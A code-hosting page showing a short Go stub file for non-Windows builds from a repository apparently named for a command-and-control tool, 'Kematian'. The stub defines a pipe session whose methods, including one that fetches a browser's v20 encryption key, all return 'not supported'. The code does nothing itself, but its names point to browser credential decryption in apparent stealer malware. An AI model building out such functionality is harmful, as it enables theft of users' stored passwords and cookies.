Files
kematianc2/Kematian-Standalone/native/recovery/platform/pipe_stub.go
T

22 lines
398 B
Go
Raw Normal View History

2026-08-27 11:23:01 -06:00
//go:build !windows
package platform
import (
"errors"
)
type PipeSession struct{}
var ActivePipeSession *PipeSession
func (s *PipeSession) Close() {}
func (s *PipeSession) GetV20Key(browserName string, encKeyBase64 string) ([]byte, error) {
return nil, errors.New("not supported")
}
func (s *PipeSession) ReadFile(path string) ([]byte, error) {
return nil, errors.New("not supported")
}